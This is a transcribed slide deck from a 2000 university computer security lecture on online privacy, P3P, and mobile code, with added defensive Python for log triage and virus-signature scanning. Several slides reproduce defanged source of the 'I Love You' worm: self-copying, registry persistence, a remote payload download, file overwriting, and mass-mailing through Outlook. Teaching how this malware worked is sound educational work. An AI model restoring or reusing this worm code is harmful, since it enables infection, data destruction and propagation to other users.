Lecture 4, 20-771: Computer Security, Fall 2000 1 20-771: Computer Security Lecture 4: Active Content & Privacy 1 Robert Thibadeau School of Computer Science Carnegie Mellon University Institute for eCommerce, Fall 2000

Jan 03, 2016


Jade Lyons

20-771: Computer Security

Lecture 4: Active Content & Privacy 1

Robert Thibadeau

School of Computer Science

Carnegie Mellon University

Institute for eCommerce, Fall 2000


Today’s lecture

• Privacy I

• Break (10 min)

• Active Content

• Quiz


This Week

Chapters 3,4,5 WS

Homework

Quiz Today


X.509v3 Certificate

-----BEGIN CERTIFICATE----- (base64 body omitted) -----END CERTIFICATE-----


X.509v3 Opened!

Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 1 (0x1)
        Signature Algorithm: md5WithRSAEncryption
        Issuer: C=XY, ST=Snake Desert, L=Snake Town, O=Snake Oil, Ltd, OU=Certificate Authority, CN=Snake Oil CA/[email protected]
        Validity
            Not Before: Oct 21 18:21:51 1999 GMT
            Not After : Oct 20 18:21:51 2001 GMT
        Subject: C=XY, ST=Snake Desert, L=Snake Town, O=Snake Oil, Ltd, OU=Webserver Team, CN=www.snakeoil.dom/[email protected]
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
            RSA Public Key: (1024 bit)
                Modulus (1024 bit):


509 Opened 2

KEY : (modulus bytes omitted)
Exponent: 65537 (0x10001)

X509v3 extensions:
    X509v3 Subject Alternative Name:
        email:[email protected]
    Netscape Comment:
        mod_ssl generated custom server certificate
    Netscape Cert Type:
        SSL Server
Signature Algorithm: md5WithRSAEncryption


 


Privacy : Introduction

• Privacy does not have the honor of having an accepted technical meaning

– PII : Personally Identifiable Information

– Privacy as insuring against the misuse of information

– Assuring that data is hidden

• Interesting Government Policy Documents

– http://www.whitehouse.gov/WH/New/Commerce/read.html

– http://www.whitehouse.gov/WH/New/html/20000501_4.html

• Sky is falling syndrome:

– http://www.privacylaw.net/ ... among many others


The Simple Cases

• Keep it completely secret so privacy is assured. (Cryptophilia)

• Make it completely public so privacy is not a problem. (Jeffersonism)

• Personally Identifiable Information, PII, (your name, address, and credit card number) is all that needs to be protected. (CreditCarditis)

• Not good enough.

• Need to tell some things to some people but don’t want those things misused.


Sky is falling Syndrome

• Considering history, FBI e-mail snooping raises red flag

• Five biggest threats to online privacy

• Privacy Group Wants Speedier Carnivore Disclosure

• FBI To Release E-mail Documents

• Verizon Site Exposed Customer Data

• Nosy Bosses Face Limits on E-Mail Spying--Workers Gain New Freedoms


Sky is Falling

• Those guys are bad guys that are taking advantage of anything I disclose and anything they can find out.

• Doubleclick and cookies

– Cookie is employed to keep track of sites you visit.

– Still, ongoing. Very hard to defeat as a practical matter.

– Very hard not to visit a place.

– Bypasses proxy services.


Silent Information Thieves!

Access Log - My NeXT Machine in my office (BSD 4.2) (/private/adm/network)

May 9 03:23:05 nageela ftpd[2184]: refused connect from 209.233.224.173
May 9 05:21:48 nageela ftpd[2203]: gethostbyname(adsl-209-233-224-173.pacbell.net): lookup failure
May 9 05:21:48 nageela ftpd[2203]: refused connect from 209.233.224.173
May 10 06:32:51 nageela ftpd[2509]: connect from vc3-49d.dsl.indra.com
May 10 06:50:45 nageela ftpd[2512]: connect from vc3-49d.dsl.indra.com
May 10 06:50:46 nageela ftpd[2513]: connect from vc3-49d.dsl.indra.com
May 13 07:11:42 nageela ftpd[4267]: connect from bilbo.ee.ualberta.ca
May 16 19:46:24 nageela telnetd[5775]: connect from 209.208.174.4
May 16 19:46:24 nageela ftpd[5776]: connect from 209.208.174.4
May 16 19:46:24 nageela ftpd[5774]: connect from 209.208.174.4
May 16 19:46:24 nageela telnetd[5777]: connect from 209.208.174.4
May 21 03:06:53 nageela telnetd[8119]: connect from hermes.globalwebdesign.com
May 21 03:06:54 nageela telnetd[8120]: connect from hermes.globalwebdesign.com
May 21 03:06:54 nageela ftpd[8121]: connect from hermes.globalwebdesign.com
May 23 07:06:29 nageela telnetd[9035]: connect from spaceace.vi.ri.cmu.edu
May 24 01:55:35 nageela ftpd[9277]: connect from 208.135.135.76
May 28 05:02:38 nageela ftpd[11282]: connect from cx884963-a.chnd1.az.home.com
May 29 02:16:38 nageela ftpd[11749]: connect from 194.204.246.130
May 30 01:48:50 nageela ftpd[12032]: connect from 140.123.224.37
May 30 02:54:36 nageela ftpd[12051]: connect from u5611a.dorm.ccu.edu.tw
Jun 3 14:09:47 nageela ftpd[14281]: connect from cr908045-a.ym1.on.wave.home.com
Jun 3 20:30:04 nageela ftpd[14425]: connect from 193.40.7.69
Jun 3 20:31:06 nageela ftpd[14426]: connect from 193.40.7.69
Jun 7 13:09:40 nageela ftpd[15728]: connect from garfield.EBICom.Net
Jun 7 13:09:42 nageela ftpd[15729]: connect from garfield.EBICom.Net
Jun 8 07:44:10 nageela ftpd[16109]: connect from dt010n13.san.rr.com
Jun 27 16:58:29 nageela ftpd[1482]: connect from 204.116.83.2
Jun 30 10:14:05 nageela telnetd[2846]: connect from dialup-wdc24655.mpx.com.au
Jun 30 10:14:12 nageela telnetd[2847]: connect from dialup-wdc24655.mpx.com.au
Jul 6 10:55:49 nageela telnetd[5356]: connect from UX6.SP.CS.CMU.EDU
Jul 9 20:56:41 nageela telnetd[6925]: connect from mozart.wisdom.weizmann.ac.il
Jul 9 20:56:41 nageela ftpd[6926]: connect from mozart.wisdom.weizmann.ac.il
Jul 9 20:56:41 nageela telnetd[6927]: connect from mozart.wisdom.weizmann.ac.il
Jul 10 08:50:42 nageela telnetd[7062]: connect from 200.230.62.36
Jul 10 08:50:43 nageela ftpd[7065]: connect from 200.230.62.36
Jul 10 08:50:43 nageela telnetd[7066]: connect from 200.230.62.36
Jul 13 00:56:01 nageela telnetd[7982]: connect from c64886-b.lakwod3.co.home.com
Jul 25 05:47:31 nageela ftpd[12972]: connect from 208.240.246.6
Jul 25 07:40:20 nageela ftpd[12990]: connect from moonbeam.connriver.net
Jul 25 07:42:54 nageela ftpd[12991]: connect from moonbeam.connriver.net
Jul 25 13:45:48 nageela ftpd[13061]: connect from aigw3.aici.com
Jul 25 13:45:48 nageela telnetd[13062]: connect from aigw3.aici.com
Jul 31 09:02:25 nageela ftpd[1146]: connect from 210.223.79.200
Jul 31 09:02:26 nageela ftpd[1147]: connect from 210.223.79.200
Aug 1 02:07:58 nageela ftpd[1364]: connect from bambina.idnet.de
Aug 1 02:17:18 nageela ftpd[1367]: connect from bambina.idnet.de
Aug 2 05:56:47 nageela telnetd[1713]: connect from c64886-b.lakwod3.co.home.com
Aug 5 23:05:53 nageela ftpd[3643]: connect from www.econ.cau.ac.kr
Aug 9 19:56:48 nageela ftpd[5362]: connect from 216.47.244.7
Aug 9 20:19:28 nageela ftpd[5368]: connect from 216.47.244.7
Aug 16 02:31:45 nageela ftpd[8304]: connect from i44pc20.info.uni-karlsruhe.de
Aug 16 02:31:45 nageela ftpd[8305]: connect from i44pc20.info.uni-karlsruhe.de
Aug 20 22:40:53 nageela telnetd[11114]: connect from kumasi.frontec-uk.com
Aug 22 22:51:33 nageela ftpd[11716]: connect from cathay-usa.com
Aug 22 22:51:34 nageela ftpd[11717]: connect from cathay-usa.com
Aug 23 22:35:31 nageela telnetd[12307]: connect from 209.135.0.220
Aug 23 22:36:34 nageela telnetd[12308]: connect from 209.135.0.220
Aug 28 21:20:58 nageela ftpd[14980]: connect from dl015.mii.zaz.com.br
Sep 2 18:30:44 nageela ftpd[18062]: connect from cx388792-a.msnv1.occa.home.com
Sep 2 18:39:43 nageela ftpd[18063]: connect from cx388792-a.msnv1.occa.home.com
Sep 7 21:26:17 nageela telnetd[20629]: connect from 198.189.134.199
Sep 8 15:02:48 nageela ftpd[21173]: connect from rht.vi.ri.cmu.edu
Sep 10 16:12:43 nageela ftpd[22555]: connect from rht.vi.ri.cmu.edu
Sep 10 16:21:19 nageela ftpd[22566]: connect from nageela.vi.ri.cmu.edu
Sep 10 16:30:14 nageela ftpd[22607]: connect from nageela.vi.ri.cmu.edu
Sep 10 16:31:47 nageela ftpd[22618]: connect from nageela.vi.ri.cmu.edu
Sep 10 16:39:09 nageela ftpd[22639]: connect from DOLLAR.ECOM.CMU.EDU
Sep 10 16:39:27 nageela telnetd[22640]: connect from DOLLAR.ECOM.CMU.EDU
Sep 10 16:41:01 nageela ftpd[22648]: connect from nageela.vi.ri.cmu.edu
Sep 10 16:42:20 nageela ftpd[22650]: refused connect from DOLLAR.ECOM.CMU.EDU
Sep 10 16:42:28 nageela telnetd[22651]: refused connect from DOLLAR.ECOM.CMU.EDU
Sep 10 17:11:37 nageela ftpd[22695]: connect from rht.vi.ri.cmu.edu
Sep 13 11:07:01 nageela telnetd[23665]: host name/address mismatch: 192.76.184.141 != lasagna.visus.com
Sep 13 11:07:01 nageela telnetd[23665]: refused connect from 192.76.184.141
Sep 13 11:07:20 nageela ftpd[23666]: host name/address mismatch: 192.76.184.141 != lasagna.visus.com
Sep 13 11:07:20 nageela ftpd[23666]: refused connect from 192.76.184.141
Sep 14 09:10:08 nageela ftpd[24182]: connect from rht.vi.ri.cmu.edu
Sep 14 14:02:22 nageela ftpd[24400]: connect from rht.vi.ri.cmu.edu
Sep 15 02:04:05 nageela ftpd[24716]: refused connect from ATBRILL.REM.CMU.EDU
Sep 15 04:36:43 nageela ftpd[24757]: connect from jelly.visus.com
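An added example (not part of the lecture) of how a defender could triage a log like the one on this slide: it parses the wrapper-style lines and flags sources that touch more than one service within a couple of seconds, get refused, or fail the name/address check. The sample lines are copied from the slide's log; the year (2000), the two-second window and the finding labels are assumptions made for the example.

```python
import re
from collections import defaultdict, namedtuple
from datetime import datetime

# Excerpt of the access log shown on the slide. The log carries no year,
# so 2000 is assumed when building timestamps.
SAMPLE_LOG = """\
May 9 03:23:05 nageela ftpd[2184]: refused connect from 209.233.224.173
May 13 07:11:42 nageela ftpd[4267]: connect from bilbo.ee.ualberta.ca
May 16 19:46:24 nageela telnetd[5775]: connect from 209.208.174.4
May 16 19:46:24 nageela ftpd[5776]: connect from 209.208.174.4
May 21 03:06:53 nageela telnetd[8119]: connect from hermes.globalwebdesign.com
May 21 03:06:54 nageela ftpd[8121]: connect from hermes.globalwebdesign.com
Aug 23 22:35:31 nageela telnetd[12307]: connect from 209.135.0.220
Aug 23 22:36:34 nageela telnetd[12308]: connect from 209.135.0.220
Sep 13 11:07:01 nageela telnetd[23665]: host name/address mismatch: 192.76.184.141 != lasagna.visus.com
Sep 13 11:07:01 nageela telnetd[23665]: refused connect from 192.76.184.141
Sep 13 11:07:20 nageela ftpd[23666]: host name/address mismatch: 192.76.184.141 != lasagna.visus.com
Sep 13 11:07:20 nageela ftpd[23666]: refused connect from 192.76.184.141
"""

MONTHS = {m: i for i, m in enumerate(
    "Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(), 1)}

# "Mon D HH:MM:SS host daemon[pid]: message"
LINE_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<time>\d{2}:\d{2}:\d{2}) "
    r"(?P<host>\S+) (?P<daemon>\w+)\[(?P<pid>\d+)\]: (?P<msg>.*)$")
CONNECT_RE = re.compile(r"^(?P<refused>refused )?connect from (?P<src>\S+)$")
MISMATCH_RE = re.compile(
    r"^host name/address mismatch: (?P<src>\S+) != (?P<name>\S+)$")

Event = namedtuple("Event", "when daemon kind src")


def parse(log_text, year=2000):
    """Turn log lines into Event tuples; lines of other shapes are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        hh, mm, ss = (int(x) for x in m.group("time").split(":"))
        when = datetime(year, MONTHS[m.group("mon")], int(m.group("day")),
                        hh, mm, ss)
        msg = m.group("msg")
        c = CONNECT_RE.match(msg)
        if c:
            kind = "refused" if c.group("refused") else "connect"
            events.append(Event(when, m.group("daemon"), kind,
                                c.group("src").lower()))
            continue
        mis = MISMATCH_RE.match(msg)
        if mis:
            events.append(Event(when, m.group("daemon"), "mismatch",
                                mis.group("src").lower()))
    return events


def findings(events, window_seconds=2):
    """Map each suspicious source to the set of reasons it was flagged."""
    by_src = defaultdict(list)
    for e in events:
        by_src[e.src].append(e)
    report = defaultdict(set)
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e.when)
        for i, first in enumerate(evs):
            # Distinct services touched within the window starting here.
            daemons = {e.daemon for e in evs[i:]
                       if (e.when - first.when).total_seconds() <= window_seconds}
            if len(daemons) > 1:
                report[src].add("multi-service probe")
        if any(e.kind == "refused" for e in evs):
            report[src].add("refused")
        if any(e.kind == "mismatch" for e in evs):
            report[src].add("name/address mismatch")
    return dict(report)


if __name__ == "__main__":
    for src, tags in sorted(findings(parse(SAMPLE_LOG)).items()):
        print(f"{src:32} {', '.join(sorted(tags))}")
```

A single connection from one host (bilbo.ee.ualberta.ca) or repeated telnet attempts a minute apart (209.135.0.220) produce no finding; telnetd and ftpd hit in the same second does.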


An Unsolvable Problem?

Privacy is clearly out of control on the Internet

There is theft of information all over the place, all the time. The controls are not disclosed and would be ridiculous if examined carefully.

Privacy Policies are ridiculous since they are one-way ultimatums trying to be “reasonable”

Restricting privacy to considering your name and address is ridiculous because there are lots of ways to identify you.

Personally Identifiable Information is ridiculous because that cannot be specified perfectly.


Authorization

• Limit actions to those that are authorized to take those actions.

– This seems OK since they can be held responsible for this.

• Limit use of information to those that are authorized to use it.

– Protects privacy if there is an “understanding” not to misuse.

– Do you believe this?


Privacy

• It is not an information problem

– PII protection is ill-defined

• It is a problem with the use of information

– Information misuse is the problem

– Information misuse is ill-defined

• It makes more sense to address the ill-defined, but vastly more pervasive and appropriate, problem of information misuse than the ill-defined problem of personally identifiable information.


Privacy Modelled after the Non-Disclosure Agreement

• What is going to be disclosed.

• For what purpose.

• Both parties agree to what information is disclosed

• Both parties agree to what use this information is put


Privacy Requires

• Legally binding default agreements

– Like Copyright or other Law (You can’t read somebody else’s mail).

• Agreements on what information is disclosed and to what use the information is put.

– Agreement is two sided.

– It is not reasonable to assume that a one-sided agreement preserves privacy.


Platform for Privacy Preferences

www.w3.org/p3p

• The legal entity making the representation.

• The site provides access to various kinds of information.

• Data practices applied to data.

• Types of data that a site collects

• Intended uses of the data.

• Purpose of data collection or purpose of uses of data.

• Retention policy on data.

• Dispute Resolution procedures (e.g., third party, customer support).

• Remedy (e.g., cash payment)

• Explanation about why the suggested practice may be valuable in a particular instance even if the user would not normally allow the practice.


Nature of P3P “Agreement”

• Client goes to Server

• Server issues ultimatum about Privacy Policy

• Client can either accept or leave.

• Methods exist for notifying User that a Privacy Policy is in violation of his Privacy Preferences, so as to allow User to change his mind.

– APPEL : Rules that say, ACCEPT, REJECT, INFORM, WARN (user).


P3P Agreement is NOT an Agreement

• It can be repudiated (I didn’t see that, my browser wasn’t working)

• There is no confirmation between the two parties of an agreement. The server must simply assume the user has agreed.

• User has no opportunity to pose a different privacy policy to server.

• User is not bound by any agreement not to disclose or misuse.

• Alternative means of passing information not covered (e.g., email?) – no explicit scope.


Two Sides

• Buyer wants things without exposing any information he discloses to any use other than what they MUST have to give him the things he wants. (Cryptophilia)

• Seller wants to know as much about Buyer as possible because this gives him control over Buyers and therefore revenue. He can also sell this information (e.g., to advertisers). He wants unrestricted use of this information.

• BUT, Buyers now collect information on Sellers and misuse that (The Sky is Falling.)

• An Agreement is bilateral. The Internet can make possible agreements public and thereby expose both Sellers and Buyers to violations.


More Rational Privacy Scenario

• TRUSTe violates privacy agreement and uses cookies to track personally identifiable information.

• Reporter violates privacy agreement and reports publicly on TRUSTe violation without first contacting the TRUSTe webmaster.

• Now we are talking trust!


Next: Active Content

• Think about the world if Active Content had privacy agreements around it.


Break!


Active Content

Also called “Mobile Code”

• Web Browsers can download and execute software automatically without warning.

• Software may damage user’s system or violate privacy.

• Administrator: This can tunnel through firewall protections.

• Case: U.S. Government came close, within two weeks, to an executive order that shut down all “mobile code” in the government.

• Failed: This would “dumb down” Federal employees and make the Government Stupid.


Threats from Mobile Code

• Purposefully malicious

– Moldovan Connection

» Sexygirls.com and Erotic2000.com

» Downloaded and ran viewer, program hung up phone and made long distance call to Moldovan, $2 per minute.

» User taken to site stayed around without knowing charge.

– “I Love You” Worm : probable accidental escape.

• Big programs have bugs

– Other people will exploit those bugs


Traditional Threats

• Trojan Horses : Very Serious. Often used for spying. (e.g., change the login program to create a back door).

• Virus : Code that replicates itself and inserts into an executable program or file.

• Macro viruses : Viruses written in the macro language of a word processor, or other trusted program. Becomes infectious on other documents.

• Rabbits : Programs that make many copies of themselves. Standalone. Denial of Service.

• Worms : Similar but spread across network.


Many Many Threats

• I Love You

– Opening email that says “I Love You” from a person you know: Trojan Horse

– Reads your address book : Privacy Violation

– Deletes image files : Havoc

– Across Network : Worm

• Demonstrated

– Microsoft Outlook could execute seriously destructive and intrusive active content without control of user.


I Love You Code (virus has been killed)

had name ‘vxryfunny.vbs’

rxm barok -lovxlxttxr(vbx) <i hatx go to school>

rxm by: spydxr / [email protected] / @GRAMMxRSoft Group / Manila,Philippinxs

dim fso,dirsystxm,dirwin,dirtxmp,filx,vbscopy,dow

Sxt fso = CrxatxObj("Scripting.FilxSystxmObj")

sxt filx = fso.OpxnTxxt(WScript.ScriptFullnamx,1)

vbscopy=filx.RxadAll


I Love You Code 2

main()
sxt wscr=CrxatxObj("WScript.Shxll")
rr=wscr.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Microsoft\Windows Scripting Host\Sxttings\Timxout")
wscr.RxgWritx "HKxY_CURRxNT_USxR\Softwarx\Microsoft\Windows Scripting Host\Sxttings\Timxout",0,"RxG_DWORD"
Sxt dirwin = fso.GxtSpxcialFoldxr(0)
Sxt dirsystxm = fso.GxtSpxcialFoldxr(1)
Sxt dirtxmp = fso.GxtSpxcialFoldxr(2)
Sxt c = fso.GxtFilx(WScript.ScriptFullNamx)
c.Copy(dirsystxm&"\MSKxrnxl32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystxm&"\Vxry Funny.vbs")
rxgruns()
html()
sprxadtoxmail()
listadriv()


I Love You Code 3 : rxgruns()

sub rxgruns()

rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\Windows\CurrxntVxrsion\Run\MSKxrnxl32",dirsystxm&"\MSKxrnxl32.vbs"

rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\Windows\CurrxntVxrsion\RunSxrvicxs\Win32DLL",dirwin&"\Win32DLL.vbs"

Dn=rxggxt("HKxY_CURRxNT_USxR\Softwarx\Microsoft\Intxrnxt xxplorxr\Download Dirory")

rxgcrxatx "HKCU\Softwarx\Microsoft\Intxrnxt xxplorxr\Main\Start Pagx","http://www.skyinxt.nxt/~young1s/HJKhjnwxrhjkxcvytwxrtnMTFwxtrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.xxx"

rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\Windows\CurrxntVxrsion\Run\WIN-BUGSFIX",downrxad&"\WIN-BUGSFIX.xxx"

rxgcrxatx "HKxY_CURRxNT_USxR\Softwarx\Microsoft\Intxrnxt xxplorxr\Main\Start Pagx","about:blank"

xnd sub


I Love You Code 4

Listing the Drives on Your Machine

(there were several of these utility-type spies)

sub listadriv

Dim d,dc,s

Sxt dc = fso.Drivxs

For xach d in dc

If d.DrivxTypx = 2 or d.DrivxTypx=3 Thxn

foldxrlist(d.path&"\")

xnd if

Nxxt

listadriv = s

xnd sub


I Love You Code 5

re-writing jpg files

sub inffilxs(foldxrspxc)
sxt f = fso.GxtFoldxr(foldxrspxc)
sxt fc = f.Filxs
for xach f1 in fc
xxt=fso.GxtxxtxnsionNamx(f1.path)
if (xxt="vbs") or (xxt="vbx") thxn
sxt ap=fso.OpxnTxxtFilx(f1.path,2,trux)
ap.writx vbscopy
ap.closx
xlsxif(xxt="jpg") or (xxt="jpxg") thxn
sxt ap=fso.OpxnTxxtFilx(f1.path,2,trux)
ap.writx vbscopy
ap.closx

(did same for mp3 files and others)


I Love You Code 6 : .ini

if (xq<>foldxrspxc) thxn
if (s="mirc32.xxx") or (s="mlink32.xxx") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") thxn
sxt scriptini=fso.CrxatxTxxtFilx(foldxrspxc&"\script.ini")
scriptini.WritxLinx "[script]"
scriptini.WritxLinx ";mIRC Script"
scriptini.WritxLinx "; Plxasx dont xdit this script... mIRC will corrupt, if mIRC will"
scriptini.WritxLinx " corrupt... WINDOWS will aff and will not run corrly. thanks"
scriptini.WritxLinx ";"
scriptini.WritxLinx ";Khalxd Mardam-Bxy"
scriptini.WritxLinx ";http://www.mirc.com"
scriptini.WritxLinx ";"
scriptini.WritxLinx "n0=on 1:JOIN:#:{"
scriptini.WritxLinx "n1= /if ( $nick == $mx ) { halt }"
scriptini.WritxLinx "n2= /.dcc sxnd $nick "&dirsystxm&"\Vxry Funny.HTM"
scriptini.WritxLinx "n3=}"
scriptini.closx
xq=foldxrspxc
nxxt
xnd sub



I Love You Code 8 : spread mail

sub sprxadtoxmail()
sxt rxgxdit=CrxatxObj("WScript.Shxll")
sxt out=WScript.CrxatxObj("Outlook.Application")
sxt mapi=out.GxtNamxSpacx("MAPI")
for ctrlists=1 to mapi.AddrxssLists.Count
sxt a=mapi.AddrxssLists(ctrlists)
rxgv=rxgxdit.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Microsoft\WAB\"&a)
if (int(a.Addrxssxntrixs.Count)>int(rxgv)) thxn
for ctrxntrixs=1 to a.Addrxssxntrixs.Count
malxad=a.Addrxssxntrixs(x)
rxgad=""
rxgad=rxgxdit.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Microsoft\WAB\"&malxad)
if (rxgad="") thxn
sxt malx=out.CrxatxItxm(0)
malx.Rxcipixnts.Add(malxad)
malx.Subj = "fwd: Jokx"
malx.Body = vbcrlf&""
malx.Attachmxnts.Add(dirsystxm&"\Vxry Funny.vbs")
malx.Sxnd
Sxt out=Nothing
Sxt mapi=Nothing
xnd sub


Silent Attacks

• It should be obvious it would not be hard to create a silent worm that sends mail on file systems, files, and address lists (and also all your mail on your local machine).

• We can do this with your web browser too …


Virus Checkers

• Pattern match in secret ways to find viral “fingerprints”

• Use a technique called “finite state automata” to create very fast search over your files.

• If virus is not known already, it will do damage.

• Finding silent viruses may be hard.
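An added example (not from the lecture) of fingerprint matching with a finite state automaton: the slide does not name an algorithm, so Aho-Corasick is used here as one standard choice that finds every signature in a single pass over the data. The signature byte strings are the defanged file names shown on the "I Love You" slides; the signature names and the renamed sample are constructed for the example.

```python
from collections import deque

# Fingerprints taken from the defanged listing on the slides.
# The names on the left are made up for this example.
SIGNATURES = {
    "drop-system-copy": b"MSKxrnxl32.vbs",
    "drop-windows-copy": b"Win32DLL.vbs",
    "autostart-download": b"WIN-BUGSFIX",
}

# Two lines of the defanged listing, and a constructed variant in which the
# dropped file was renamed (an "unknown" sample the signature set has not seen).
KNOWN_SAMPLE = (rb'c.Copy(dirsystxm&"\MSKxrnxl32.vbs")' + b"\n" +
                rb'c.Copy(dirwin&"\Win32DLL.vbs")')
RENAMED_SAMPLE = rb'c.Copy(dirsystxm&"\Updatx32.vbs")'


class SignatureScanner:
    """Aho-Corasick automaton over bytes: build once, scan in linear time."""

    def __init__(self, signatures):
        self.goto = [{}]   # state -> {byte value: next state}
        self.fail = [0]    # state -> state for the longest proper suffix
        self.out = [[]]    # state -> [(signature name, length)] ending here
        for name, pattern in signatures.items():
            self._insert(name, pattern)
        self._link()

    def _insert(self, name, pattern):
        state = 0
        for b in pattern:
            nxt = self.goto[state].get(b)
            if nxt is None:
                nxt = len(self.goto)
                self.goto.append({})
                self.fail.append(0)
                self.out.append([])
                self.goto[state][b] = nxt
            state = nxt
        self.out[state].append((name, len(pattern)))

    def _link(self):
        # Breadth-first, so a state's failure target is finished before it.
        queue = deque(self.goto[0].values())
        while queue:
            state = queue.popleft()
            for b, nxt in self.goto[state].items():
                queue.append(nxt)
                f = self.fail[state]
                while f and b not in self.goto[f]:
                    f = self.fail[f]
                self.fail[nxt] = self.goto[f].get(b, 0)
                # Inherit matches that end at the suffix state.
                self.out[nxt] = self.out[nxt] + self.out[self.fail[nxt]]

    def scan(self, data):
        """Return [(offset, signature name)] for every match in data."""
        state, hits = 0, []
        for pos, b in enumerate(data):
            while state and b not in self.goto[state]:
                state = self.fail[state]
            state = self.goto[state].get(b, 0)
            for name, length in self.out[state]:
                hits.append((pos - length + 1, name))
        return hits


if __name__ == "__main__":
    scanner = SignatureScanner(SIGNATURES)
    print("known sample  :", scanner.scan(KNOWN_SAMPLE))
    print("renamed sample:", scanner.scan(RENAMED_SAMPLE))
```

The renamed sample returns no hits, which is the slide's third bullet in practice: a fingerprint scanner only recognizes what is already in its signature set.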


Authenticode System

• Windows 2000

• Running code requires an X.509v3 Certificate with an approved CA

• Personal Publishers (ID with Credit Bureau)

• Commercial Publishers (Articles of Incorporation)

• Sign a pledge: “reasonable care consistent with prevailing industry standards to keep code free from viruses, malicious code, and other data that may damage, misappropriate, or otherwise interfere with a third party’s operations.”

• Remedy: Revoke your Certificate (HA!)


Steps you can Take

• Don’t run as administrator/root

• Use Virus Checkers (but watch those companies!!!)

• Backup Often

• Verify the integrity and authenticity of software.

– A very good idea is to not accept active code without a certificate that guarantees the author can be found!

– Same principle as “mutually assured destruction” or “keep the pilot on the plane!” He won’t hurt you if you can hurt him.


Finally,

• Even if Adobe is the authentic code writer/distributor, get them to agree to your privacy!